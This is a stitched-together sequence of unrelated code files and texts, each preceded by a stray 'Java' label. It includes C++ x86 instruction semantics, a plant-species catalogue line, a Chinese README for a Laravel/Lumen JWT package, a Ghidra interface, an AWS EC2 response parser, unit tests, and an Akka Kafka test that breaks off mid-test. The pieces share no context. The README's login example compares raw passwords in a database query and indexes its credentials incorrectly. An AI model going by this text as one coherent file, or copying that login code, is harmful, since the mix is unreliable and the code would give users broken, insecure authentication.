DEF_ISEL(MOVSXD_GPRv_GPRz_16) = MOVSX<R32W, R16, int32_t>;
DEF_ISEL(MOVSXD_GPRv_GPRz_32) = MOVSX<R32W, R32, int32_t>;
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_32) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_32) = MOVSX<R64W, R32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMd_64) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_MEMz_64) = MOVSX<R64W, M32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPR32_64) = MOVSX<R64W, R32, int64_t>;)
IF_64BIT(DEF_ISEL(MOVSXD_GPRv_GPRz_64) = MOVSX<R64W, R32, int64_t>;)

#if HAS_FEATURE_AVX512
namespace {

// VPMOVSXBQ (128-bit form): masked per-lane sign extension of packed
// bytes to packed quadwords. Two 64-bit lanes; a lane whose mask bit in
// `k1` is clear is written as 0 (zero-masking as written here), otherwise
// it receives the sign-extended source byte.
template <typename D, typename K, typename S>
DEF_SEM(VPMOVSXBQ_MASKmskw_SIMD128, D dst, K k1, S src) {
  auto src_vec = SReadV8(src);
  // Start from a cleared destination vector, then fill lanes below.
  auto dst_vec = SClearV64(SReadV64(dst));
  auto k_vec = Read(k1);
  for (auto i = 0u; i < 2u; i++) {
    if (READBIT(k_vec, i) == 0) {
      dst_vec = SInsertV64(dst_vec, i, 0);
    } else {
      auto v = SExtTo<int64_t>(SExtractV8(src_vec, i));
      dst_vec = SInsertV64(dst_vec, i, v);
    }
  }
  SWriteV64(dst, dst_vec);
  return memory;
}

// VPMOVSXWD (128-bit form): masked per-lane sign extension of packed
// 16-bit words to packed 32-bit dwords, four lanes; masked-off lanes are
// written as 0.
template <typename D, typename K, typename S>
DEF_SEM(VPMOVSXWD_MASKmskw_SIMD128, D dst, K k1, S src) {
  auto src_vec = SReadV16(src);
  auto dst_vec = SClearV32(SReadV32(dst));
  auto k_vec = Read(k1);
  for (auto i = 0u; i < 4u; i++) {
    if (READBIT(k_vec, i) == 0) {
      dst_vec = SInsertV32(dst_vec, i, 0);
    } else {
      auto v = SExtTo<int32_t>(SExtractV16(src_vec, i));
      dst_vec = SInsertV32(dst_vec, i, v);
    }
  }
  SWriteV32(dst, dst_vec);
  return memory;
}

// KMOVW: move a 16-bit mask value. The source is truncated to 16 bits
// (UInt16) and then zero-extended into the destination operand.
template <typename S1, typename S2>
DEF_SEM(KMOVW, S1 dst, S2 src) {
  WriteZExt(dst, UInt16(Read(src)));
  return memory;
}

}  // namespace

DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_MEMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, MV16>;
DEF_ISEL(VPMOVSXBQ_XMMi64_MASKmskw_XMMi8_AVX512) = VPMOVSXBQ_MASKmskw_SIMD128<VV128W, R8, V128>;
DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_MEMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, MV64>;
DEF_ISEL(VPMOVSXWD_XMMi32_MASKmskw_XMMi16_AVX512) = VPMOVSXWD_MASKmskw_SIMD128<VV128W, R8, V128>;
// KMOVW between mask registers, GPRs, and 16-bit memory.
DEF_ISEL(KMOVW_MASKmskw_MASKu16_AVX512) = KMOVW<R64W, R64>;
DEF_ISEL(KMOVW_GPR32u32_MASKmskw_AVX512) = KMOVW<R32W, R64>;
DEF_ISEL(KMOVW_MASKmskw_GPR32u32_AVX512) = KMOVW<R64W, R32>;
DEF_ISEL(KMOVW_MASKmskw_MEMu16_AVX512) = KMOVW<R64W, M16>;
DEF_ISEL(KMOVW_MEMu16_MASKmskw_AVX512) = KMOVW<M16W, R64>;
#endif  // HAS_FEATURE_AVX512
Java
# Bihai stricta (Huber) Griggs SPECIES #### Status SYNONYM #### According to The Catalogue of Life, 3rd January 2011 #### Published in null #### Original name null ### Remarks null
Java
/**
 * Copyright 2011-2017 Asakusa Framework Team.
 *
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package com.asakusafw.compiler.batch;

import com.asakusafw.compiler.batch.batch.JobFlow1;
import com.asakusafw.vocabulary.batch.Batch;
import com.asakusafw.vocabulary.batch.BatchDescription;

/**
 * A batch class which is not public (package-private).
 *
 * <p>NOTE(review): given the {@code compiler.batch} package, this looks like a
 * fixture used to exercise the compiler's visibility validation for batch
 * classes -- confirm against the test that references it.</p>
 */
@Batch(name = "testing")
class NotPublic extends BatchDescription {

    @Override
    protected void describe() {
        // Registers JobFlow1 as the only element of this batch.
        // NOTE(review): soon() presumably schedules the flow with no
        // predecessor dependencies -- confirm against BatchDescription docs.
        run(JobFlow1.class).soon();
    }
}
Java
# 注意!!! 由于该库的主要目的是JWT的实现原理的技术分享,而我目前忙于公司的Android项目,暂没有时间维护当前扩展包(对Laravel5.4的兼容性不好),并且扩展包稳定性还有待验证,不推荐使用到正式环境。 所以我推荐大家使用 https://github.com/tymondesigns/jwt-auth :),如果你有JWT相关不懂的,可以提issue,大家一起探讨。 如果你想学习JWT的实现原理,我相信本项目应该会带给你一些帮助:),配合专栏食用更佳 https://zhuanlan.zhihu.com/p/22531819 # jwt-auth [![PHP version](https://badge.fury.io/ph/lsxiao%2Fjwt-auth.svg)](https://badge.fury.io/ph/lsxiao%2Fjwt-auth) Laravel/Lumen JSON Web Token 认证扩展包 ## 待完成 - [ ] 更加详细的单元测试 - [ ] 命令行生成HMAC RSA 秘钥 ## 引入jwt-auth到项目中 ```bash composer require "lsxiao/jwt-auth" ``` ## 使用方法 ### 配置jwt-auth #### Laravel ```bash php artisan vendor:publish ``` jwt.php配置文件会被拷贝到项目根目录的config文件夹中 #### Lumen 在项目的lumen项目的根目录创建config文件夹,将```jwt.php```配置文件复制到此处 ```php <?php return [ /* |-------------------------------------------------------------------------- | HMAC 签名秘钥 |-------------------------------------------------------------------------- | | HMAC 签名秘钥是用来为token进行HMAC签名的,必须在.env文件中设置。 | */ 'secret_key' => env('JWT_SECRET_KEY'), /* |-------------------------------------------------------------------------- | RSA 签名私钥 |-------------------------------------------------------------------------- | | RSA 签名私钥是用来为token进行RSA签名的,必须在.env文件中设置。 | */ 'private_secret_key' => env('JWT_PRIVATE_SECRET_KEY'), /* |-------------------------------------------------------------------------- | RSA 签名公钥 |-------------------------------------------------------------------------- | | RSA 签名公钥是用来为token进行RSA签名解密的,必须在.env文件中设置。 | */ 'public_secret_key' => env('JWT_PUBLIC_SECRET_KEY'), /* |-------------------------------------------------------------------------- | Token 有效期 |-------------------------------------------------------------------------- | | 指定token的有效时间(单位分钟),默认1小时。 | */ 'ttl' => env('JWT_TTL', 60), /* |-------------------------------------------------------------------------- | Token 刷新有效期 |-------------------------------------------------------------------------- | | 指定token过期后,多长一段时间内,使用过期的token能够刷新。默认为3周 | */ 'refresh_ttl' => 
env('JWT_REFRESH_TTL', 30240),

    /*
    |--------------------------------------------------------------------------
    | JWT 算法ID
    |--------------------------------------------------------------------------
    |
    | Token HMAC签名的HASH算法
    | 对称算法:
    | HS256, HS384, HS512
    | 非对称算法,需提供公私钥:
    | RS256, RS384, RS512
    */
    'algorithm_id' => env('JWT_ALGORITHM', \Lsxiao\JWT\Singer\HMAC::DEFAULT_ALGO_ID),

    /*
    |--------------------------------------------------------------------------
    | 指定Token在某时间之前无法使用
    |--------------------------------------------------------------------------
    |
    | 指定一个时间增量(单位秒),在此签发时间+此时间增量之前,Token都不能使用
    |
    */
    'not_before' => env('JWT_NOT_BEFORE', 0),

    /*
    |--------------------------------------------------------------------------
    | 刷新Token次数差值
    |--------------------------------------------------------------------------
    |
    | 最新刷新次数会缓存在Server,如果客户端的token刷新次数与Server缓存相差大于此值,就会判定无效Token
    |
    */
    'refresh_diff_limit' => env('JWT_REFRESH_DIFF_LIMIT', 2),

    /*
    |--------------------------------------------------------------------------
    | 黑名单宽限时间,单位秒
    |--------------------------------------------------------------------------
    |
    | 每次刷新后,Token会被加入黑名单,在高并发的情况下,后续请求Token会无效,当设置宽限时间后,
    | Token刷新后,加入黑名单的Token只要处于宽限时间内,则是有效的。
    |
    */
    'blacklist_grace_time' => env('JWT_BLACK_LIST_GRACE_TIME', 30)
];
```

### 配置auth

#### Laravel

在config文件夹中找到auth.php

#### Lumen

将```auth.php```配置文件复制到config文件夹

修改如下:

```php
<?php
return [
    'defaults' => [
        'guard' => env('AUTH_GUARD', 'api'),
    ],
    'guards' => [
        'api' => ['driver' => 'jwt'],//这里必须是jwt,由JWTGuard驱动
    ],
    'providers' => [
        //
    ],
];
```

### 开启认证

修改 bootstrap/app.php,取消 auth middleware 及 AuthServiceProvider 的注释

修改 app/Providers/AuthServiceProvider.php 的 boot 方法:

```php
public function boot()
{
    $this->app->configure('jwt');
    $this->app['auth']->viaRequest('api', function ($request) {
        $token = \Lsxiao\JWT\Token::fromRequest($request);
        if (!empty($token) && $token->isValid()) {
            $userid = $token->getClaim('sub')->getValue();
            return User::find($userid);
        }
    });
}
```

### 用户类

用户类 User
需要确认已实现 \Illuminate\Contracts\Auth\Authenticatable 接口,默认的 User 类即可 ### 在Controller中根据账号密码获取Token ```php public function login(Request $request) { //通过user返回一个Token $credentials = $request->only('email', 'password'); $user = User::where('email', $credentials[0])->where('password', $credentials[1])->first(); $token = \Lsxiao\JWT\Token::fromUser($user); return response()->json(['token' => $token]); } ``` ### 在需要的地方刷新Token Controller 中 ```php public function login(Request $request) { //从请求取出证书,也就是邮件密码    $token = \Lsxiao\JWT\Token::refreshToken($request);    if (!$token) { throw new TokenInvalidException("refresh failed"); } return response()->json(['token' => $token]); } ``` Middleware 中 ```php public function handle($request, Closure $next, $guard = null) { if ($this->auth->guard($guard)->guest()) { return response('Unauthorized.', 401); } $response = $next($request); // RefreshToken : reset HTTP Response Header \Lsxiao\JWT\Token::refreshToken($request, $response); return $response; } ``` ### 需要处理的异常 所有异常都继承自`Lsxiao\JWT\Exception\BaseJWTException`,建议在`App\Exceptions\Handler`处理异常,返回不同的HTTP status code - `Lsxiao\JWT\Exception\SecretKeyException` 秘钥在.evn文件中不存在,秘钥不符合规范等 - `Lsxiao\JWT\Exception\TokenExpiredException` Token 过期 - `Lsxiao\JWT\Exception\TokenInvalidException` Token 无效 - `Lsxiao\JWT\Exception\TokenNotInRequestException` Token不存在于Request QueryParam或者Body或者Header中 - `Lsxiao\JWT\Exception\TokenParseException` token解析异常 - `Lsxiao\JWT\Exception\UnauthorizedException` 未授权异常 ## 版本说明 - 1.0.4 (2016-11-21) - 修复hasBlacklistGraceTimeOrNotInBlacklist函数的bug。 - 1.0.3 (2016-11-21) - 修复Auth::refreshToken方法不能刷新成功的严重BUG - 1.0.2 (2016-10-28) - 支持Laravel,提供LaravelServiceProvider - 1.0.1 (2016-10-28) - 修复获取用户的时候没进行身份认证的BUG - 1.0 (2016-9-29) - jwt基本功能提交 ## 维护人 知乎 : [@面条](https://www.zhihu.com/people/lsxiao) Github : [@lsxiao](https://github.com/lsxiao) ## 开源许可 Copyright 2016 lsxiao, Inc. 
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
Java
package com.google.api.ads.dfp.jaxws.v201511;

import javax.xml.bind.annotation.XmlEnum;
import javax.xml.bind.annotation.XmlType;

/**
 * JAXB binding for the {@code CustomTargetingValue.Status} simple type.
 *
 * <p>The underlying schema restricts the value to one of the following
 * string enumerations:
 *
 * <pre>
 * &lt;simpleType name="CustomTargetingValue.Status"&gt;
 *   &lt;restriction base="{http://www.w3.org/2001/XMLSchema}string"&gt;
 *     &lt;enumeration value="ACTIVE"/&gt;
 *     &lt;enumeration value="INACTIVE"/&gt;
 *     &lt;enumeration value="UNKNOWN"/&gt;
 *   &lt;/restriction&gt;
 * &lt;/simpleType&gt;
 * </pre>
 */
@XmlType(name = "CustomTargetingValue.Status")
@XmlEnum
public enum CustomTargetingValueStatus {

    /** The object is active. */
    ACTIVE,

    /** The object is no longer active. */
    INACTIVE,

    /**
     * Returned when the actual value is not exposed by the requested
     * API version.
     */
    UNKNOWN;

    /**
     * Returns the XML lexical representation of this constant, which is
     * identical to the constant's name.
     */
    public String value() {
        return this.name();
    }

    /**
     * Resolves the XML lexical representation {@code v} to its enum
     * constant.
     *
     * @throws IllegalArgumentException if {@code v} is not a known value
     */
    public static CustomTargetingValueStatus fromValue(String v) {
        return CustomTargetingValueStatus.valueOf(v);
    }
}
Java
/* ### * IP: GHIDRA * REVIEWED: YES * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package ghidra.app.plugin.core.compositeeditor; /** * Composite Viewer Model component selection change listener interface. */ public interface CompositeModelSelectionListener { /** * Called to indicate the model's component selection has changed. */ void selectionChanged(); }
Java
/*
* Copyright 2010-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
*  http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed
* on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
* express or implied. See the License for the specific language governing
* permissions and limitations under the License.
*/

#include <aws/ec2/model/DescribeInstancesResponse.h>
#include <aws/core/utils/xml/XmlSerializer.h>
#include <aws/core/AmazonWebServiceResult.h>
#include <aws/core/utils/StringUtils.h>
#include <aws/core/utils/logging/LogMacros.h>

#include <utility>

using namespace Aws::EC2::Model;
using namespace Aws::Utils::Xml;
using namespace Aws::Utils::Logging;
using namespace Aws::Utils;
using namespace Aws;

// Default constructor: leaves all members in their default-initialized state.
DescribeInstancesResponse::DescribeInstancesResponse()
{
}

// Constructs the response directly from a service result by delegating to
// the XML-parsing assignment operator below.
DescribeInstancesResponse::DescribeInstancesResponse(const Aws::AmazonWebServiceResult<XmlDocument>& result)
{
  *this = result;
}

// Parses the DescribeInstances XML payload into this object: the
// reservation list, the pagination token, and the request id.
DescribeInstancesResponse& DescribeInstancesResponse::operator =(const Aws::AmazonWebServiceResult<XmlDocument>& result)
{
  const XmlDocument& xmlDocument = result.GetPayload();
  XmlNode rootNode = xmlDocument.GetRootElement();
  XmlNode resultNode = rootNode;
  // Some payloads wrap the result in a <DescribeInstancesResponse> element;
  // descend into it when the root node is named differently.
  if (!rootNode.IsNull() && (rootNode.GetName() != "DescribeInstancesResponse"))
  {
    resultNode = rootNode.FirstChild("DescribeInstancesResponse");
  }

  if(!resultNode.IsNull())
  {
    // Each <item> under <reservationSet> becomes one Reservation entry.
    XmlNode reservationsNode = resultNode.FirstChild("reservationSet");
    if(!reservationsNode.IsNull())
    {
      XmlNode reservationsMember = reservationsNode.FirstChild("item");
      while(!reservationsMember.IsNull())
      {
        m_reservations.push_back(reservationsMember);
        reservationsMember = reservationsMember.NextNode("item");
      }
    }
    // Pagination token for fetching the next page of results, if present.
    XmlNode nextTokenNode = resultNode.FirstChild("nextToken");
    if(!nextTokenNode.IsNull())
    {
      m_nextToken = StringUtils::Trim(nextTokenNode.GetText().c_str());
    }
  }

  if (!rootNode.IsNull()) {
    // The request id lives directly under the root node, not the result node.
    XmlNode requestIdNode = rootNode.FirstChild("requestId");
    if (!requestIdNode.IsNull())
    {
      m_responseMetadata.SetRequestId(StringUtils::Trim(requestIdNode.GetText().c_str()));
    }
    AWS_LOGSTREAM_DEBUG("Aws::EC2::Model::DescribeInstancesResponse", "x-amzn-request-id: " << m_responseMetadata.GetRequestId() );
  }

  return *this;
}
Java
/* * This file is part of "lunisolar-magma". * * (C) Copyright 2014-2022 Lunisolar (http://lunisolar.eu/). * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package eu.lunisolar.magma.asserts.func.function.to; import eu.lunisolar.magma.asserts.func.FunctionalAttest.AssertionsCheck; import eu.lunisolar.magma.asserts.func.FunctionalAttest.SemiEvaluation; import eu.lunisolar.magma.func.supp.Be; import eu.lunisolar.magma.asserts.func.FunctionalAttest; import eu.lunisolar.magma.asserts.func.FunctionalAttest.*; import javax.annotation.Nonnull; // NOSONAR import javax.annotation.Nullable; // NOSONAR import eu.lunisolar.magma.func.supp.check.Checks; // NOSONAR import eu.lunisolar.magma.basics.meta.*; // NOSONAR import eu.lunisolar.magma.basics.meta.functional.*; // NOSONAR import eu.lunisolar.magma.basics.meta.functional.type.*; // NOSONAR import eu.lunisolar.magma.basics.meta.functional.domain.*; // NOSONAR import eu.lunisolar.magma.func.action.*; // NOSONAR import java.util.function.*; import eu.lunisolar.magma.func.function.to.*; import eu.lunisolar.magma.func.action.*; // NOSONAR import eu.lunisolar.magma.func.consumer.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.bi.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.obj.*; // NOSONAR import eu.lunisolar.magma.func.consumer.primitives.tri.*; // NOSONAR import eu.lunisolar.magma.func.function.*; // NOSONAR import 
eu.lunisolar.magma.func.function.conversion.*; // NOSONAR
import eu.lunisolar.magma.func.function.from.*; // NOSONAR
import eu.lunisolar.magma.func.function.to.*; // NOSONAR
import eu.lunisolar.magma.func.operator.binary.*; // NOSONAR
import eu.lunisolar.magma.func.operator.ternary.*; // NOSONAR
import eu.lunisolar.magma.func.operator.unary.*; // NOSONAR
import eu.lunisolar.magma.func.predicate.*; // NOSONAR
import eu.lunisolar.magma.func.supplier.*; // NOSONAR
import eu.lunisolar.magma.func.function.to.LToIntBiFunction.*;

/**
 * Assert class for LToIntObj1Obj0Func.
 *
 * <p>Wraps an {@code LToIntObj1Obj0Func} (the argument-swapped variant of
 * {@code LToIntBiFunction}) so that its int results can be checked with the
 * fluent attest/evaluation DSL.</p>
 */
public final class LToIntObj1Obj0FuncAttest<T2, T1> extends FunctionalAttest.Full<LToIntObj1Obj0FuncAttest<T2, T1>, LToIntObj1Obj0Func<T2, T1>, LBiConsumer<T2, T1>, Checks.CheckInt> {

	/**
	 * Wraps the function under test.
	 */
	public LToIntObj1Obj0FuncAttest(LToIntObj1Obj0Func<T2, T1> actual) {
		super(actual);
	}

	/**
	 * Factory entry point: creates an attest wrapper for the given function.
	 */
	@Nonnull
	public static <T2, T1> LToIntObj1Obj0FuncAttest<T2, T1> attestToIntObj1Obj0Func(LToIntBiFunction.LToIntObj1Obj0Func<T2, T1> func) {
		return new LToIntObj1Obj0FuncAttest(func);
	}

	/**
	 * Starts an evaluation of the function's result for the given arguments
	 * (note the Obj1Obj0 argument order: a2 first, then a1).
	 *
	 * <p>The returned evaluation invokes the wrapped function lazily; the
	 * optional pre-call consumer {@code pc} is run with the same arguments
	 * before the function itself, and the int result is handed to
	 * {@code Checks.attest} for assertion.</p>
	 */
	@Nonnull
	public IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>> doesApplyAsInt(T2 a2, T1 a1) {

		return new IntEvaluation<LToIntObj1Obj0FuncAttest<T2, T1>, LBiConsumer<T2, T1>>(this, () -> String.format("(%s,%s)", a2, a1), (desc, pc) -> {

			var func = value();
			// Guard: the wrapped function must have been supplied.
			Checks.check(func).must(Be::notNull, "Actual function is null.");

			if (pc != null) {
				pc.accept(a2, a1);
			}

			var result = func.applyAsIntObj1Obj0(a2, a1);
			return Checks.attest(result, desc);
		}, recurringAssert);
	}

}
Java
// [[[[INFO>
// Copyright 2015 Epicycle (http://epicycle.org, https://github.com/open-epicycle)
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
//     http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
// For more information check https://github.com/open-epicycle/Epicycle.Input-cs
// ]]]]

using NUnit.Framework;

namespace Epicycle.Input.Keyboard
{
    /// <summary>
    /// Unit tests for <see cref="KeyEventArgs{TKeyId, TAdditionalData}"/>.
    /// </summary>
    [TestFixture]
    public class KeyEventArgsTest
    {
        [Test]
        public void ctor_sets_properties_correctly()
        {
            // Arrange: distinct sentinel values so each property can be checked independently.
            const int keyId = 123;
            const int additionalData = 234;

            // Act
            var args = new KeyEventArgs<int, int>(keyId, KeyEventType.Released, additionalData);

            // Assert: every constructor argument is exposed through its matching property.
            Assert.That(args.KeyId, Is.EqualTo(keyId));
            Assert.That(args.EventType, Is.EqualTo(KeyEventType.Released));
            Assert.That(args.AdditionalData, Is.EqualTo(additionalData));
        }
    }
}
Java
/*
 * Copyright (C) 2014 - 2016 Softwaremill <http://softwaremill.com>
 * Copyright (C) 2016 - 2019 Lightbend Inc. <http://www.lightbend.com>
 */

package akka.kafka.internal

import akka.Done
import akka.actor.ActorSystem
import akka.kafka.ConsumerMessage._
import akka.kafka.{internal, CommitterSettings, ConsumerSettings, Subscriptions}
import akka.kafka.scaladsl.{Committer, Consumer}
import akka.kafka.scaladsl.Consumer.Control
import akka.kafka.tests.scaladsl.LogCapturing
import akka.stream._
import akka.stream.scaladsl._
import akka.stream.testkit.scaladsl.StreamTestKit.assertAllStagesStopped
import akka.stream.testkit.scaladsl.TestSink
import akka.testkit.TestKit
import org.apache.kafka.clients.consumer._
import org.apache.kafka.common.TopicPartition
import org.apache.kafka.common.serialization.StringDeserializer
import org.scalatest.concurrent.ScalaFutures
import org.scalatest.{BeforeAndAfterAll, FlatSpecLike, Matchers}

import scala.jdk.CollectionConverters._
import scala.collection.immutable.Seq
import scala.concurrent.duration._
import scala.concurrent.{Await, Future}

/** Test fixtures: factories for committable messages backed by synthetic ConsumerRecords. */
object CommittingWithMockSpec {

  type K = String
  type V = String
  type Record = ConsumerRecord[K, V]

  // Convenience overload: message on the default topic "topic".
  def createMessage(seed: Int): CommittableMessage[K, V] = createMessage(seed, "topic")

  // Builds a CommittableMessage whose offset equals `seed` and whose key/value are `seed.toString`.
  // Partition is always 1. The CommittableOffsetImpl is created with a null committer
  // (the tests never use it through that path; they drive commits via the mock's callback).
  def createMessage(seed: Int,
                    topic: String,
                    groupId: String = "group1",
                    metadata: String = ""): CommittableMessage[K, V] = {
    val offset = PartitionOffset(GroupTopicPartition(groupId, topic, 1), seed.toLong)
    val record = new ConsumerRecord(offset.key.topic, offset.key.partition, offset.offset, seed.toString, seed.toString)
    CommittableMessage(record, CommittableOffsetImpl(offset, metadata)(null))
  }

  // Extracts the underlying Kafka record for enqueueing into the mock consumer.
  def toRecord(msg: CommittableMessage[K, V]): ConsumerRecord[K, V] = msg.record
}

/**
 * Tests offset committing against a mocked Kafka consumer.
 *
 * `ConsumerMock` (project-local, not shown here) presumably records every commitAsync
 * invocation in its LogHandler as (offsets, callback) pairs; the tests assert on those
 * recorded calls and then invoke the callback themselves to emulate the broker's
 * commit response — TODO confirm against ConsumerMock's definition.
 */
class CommittingWithMockSpec(_system: ActorSystem)
    extends TestKit(_system)
    with FlatSpecLike
    with Matchers
    with BeforeAndAfterAll
    with ScalaFutures
    with LogCapturing {
  import CommittingWithMockSpec._

  // Generous patience: commits are aggregated asynchronously, so assertions may need to wait.
  implicit val patience: PatienceConfig = PatienceConfig(15.seconds, 1.second)

  def this() = this(ActorSystem())

  override def afterAll(): Unit =
    shutdown(system)

  // Fuzzing shuffles stream event ordering to surface race conditions in the stages under test.
  implicit val m = ActorMaterializer(ActorMaterializerSettings(_system).withFuzzing(true))
  implicit val ec = _system.dispatcher
  val messages = (1 to 1000).map(createMessage)

  // Drives a committable source with the given chunks of messages and verifies
  // they all arrive downstream, then shuts the stream down.
  def checkMessagesReceiving(msgss: Seq[Seq[CommittableMessage[K, V]]]): Unit = {
    val mock = new ConsumerMock[K, V]()
    val (control, probe) = createCommittableSource(mock.mock)
      .toMat(TestSink.probe)(Keep.both)
      .run()

    probe.request(msgss.map(_.size).sum.toLong)
    msgss.foreach(chunk => mock.enqueue(chunk.map(toRecord)))
    probe.expectNextN(msgss.flatten)

    Await.result(control.shutdown(), remainingOrDefault)
  }

  // Committable source wired to the mocked Kafka consumer instead of a real one.
  def createCommittableSource(mock: Consumer[K, V],
                              groupId: String = "group1",
                              topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] =
    Consumer.committableSource(
      ConsumerSettings
        .create(system, new StringDeserializer, new StringDeserializer)
        .withGroupId(groupId)
        .withConsumerFactory(_ => mock),
      Subscriptions.topics(topics)
    )

  // Same as above but attaches per-record commit metadata via `metadataFromRecord`.
  def createSourceWithMetadata(mock: Consumer[K, V],
                               metadataFromRecord: ConsumerRecord[K, V] => String,
                               groupId: String = "group1",
                               topics: Set[String] = Set("topic")): Source[CommittableMessage[K, V], Control] =
    Consumer.commitWithMetadataSource(
      ConsumerSettings
        .create(system, new StringDeserializer, new StringDeserializer)
        .withGroupId(groupId)
        .withCloseTimeout(ConsumerMock.closeTimeout)
        .withConsumerFactory(_ => mock),
      Subscriptions.topics(topics),
      metadataFromRecord
    )

  it should "commit metadata in message" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    // Metadata is the record's offset rendered as a string.
    val (control, probe) = createSourceWithMetadata(mock.mock, (rec: ConsumerRecord[K, V]) => rec.offset.toString)
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msg = createMessage(1)
    mock.enqueue(List(toRecord(msg)))

    probe.request(100)
    val done = probe.expectNext().committableOffset.commitInternal()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    val (topicPartition, offsetMeta) = commitLog.calls.head._1.head
    topicPartition.topic should ===(msg.record.topic())
    topicPartition.partition should ===(msg.record.partition())

    // committed offset should be the next message the application will consume, i.e. +1
    offsetMeta.offset should ===(msg.record.offset() + 1)
    offsetMeta.metadata should ===(msg.record.offset.toString)

    //emulate commit
    commitLog.calls.head match {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(done, remainingOrDefault)
    Await.result(control.shutdown(), remainingOrDefault)
  }

  it should "call commitAsync for commit message and then complete future" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createCommittableSource(mock.mock)
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msg = createMessage(1)
    mock.enqueue(List(toRecord(msg)))

    probe.request(100)
    val done = probe.expectNext().committableOffset.commitInternal()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    val (topicPartition, offsetMeta) = commitLog.calls.head._1.head
    topicPartition.topic should ===(msg.record.topic())
    topicPartition.partition should ===(msg.record.partition())

    // committed offset should be the next message the application will consume, i.e. +1
    offsetMeta.offset should ===(msg.record.offset() + 1)

    //emulate commit
    commitLog.calls.head match {
      case (offsets, callback) => callback.onComplete(offsets.asJava, null)
    }

    Await.result(done, remainingOrDefault)
    Await.result(control.shutdown(), remainingOrDefault)
  }

  it should "fail future in case of commit fail" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createCommittableSource(mock.mock)
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val msg = createMessage(1)
    mock.enqueue(List(toRecord(msg)))

    probe.request(100)
    val done = probe.expectNext().committableOffset.commitInternal()

    awaitAssert {
      commitLog.calls should have size (1)
    }

    //emulate commit failure
    val failure = new Exception()
    commitLog.calls.head match {
      case (offsets, callback) => callback.onComplete(null, failure)
    }

    // The exact exception instance passed to the callback must surface through the commit future.
    intercept[Exception] {
      Await.result(done, remainingOrDefault)
    } should be(failure)

    Await.result(control.shutdown(), remainingOrDefault)
  }

  it should "collect commits to be sent to commitAsync" in assertAllStagesStopped {
    val commitLog = new ConsumerMock.LogHandler()
    val mock = new ConsumerMock[K, V](commitLog)
    val (control, probe) = createCommittableSource(mock.mock)
      .toMat(TestSink.probe)(Keep.both)
      .run()

    val count = 100
    val msgs = (1 to count).map(createMessage)
    mock.enqueue(msgs.map(toRecord))

    probe.request(count.toLong)
    // Commit each message individually; the implementation is expected to aggregate them.
    val allCommits = Future.sequence(probe.expectNextN(count.toLong).map(_.committableOffset.commitInternal()))

    withClue("the commits are aggregated to a low number of calls to commitAsync:") {
      awaitAssert {
        val callsToCommitAsync = commitLog.calls.size
        callsToCommitAsync should be >= 1
        callsToCommitAsync should be < count / 10
      }
    }

